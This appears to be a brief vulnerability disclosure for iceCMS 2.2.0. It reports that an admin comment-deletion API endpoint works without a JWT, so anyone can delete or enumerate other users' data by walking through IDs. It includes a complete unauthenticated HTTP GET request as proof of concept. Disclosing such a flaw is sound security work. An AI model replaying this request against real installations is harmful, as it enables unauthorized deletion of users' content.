iceCMS-2.2.0 has an error access control vulnerability that allows unauthorized deletion of other user data
This vulnerability exists in the content management subfunction of the admin background administration function
After deleting the JWT Token used for authentication, data can still be obtained, and all user data can be obtained by traversing the ID
The original comment with id 121 has been removed
GET /api/squareComment/DelectSquareById/121 HTTP/1.1
Host: 192.168.65.227:3000
Authorization:
Cache-Control: no-cache
Referer: http://192.168.65.227:3000/adplanet/PlanetCommentList
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: application/json, text/plain, */*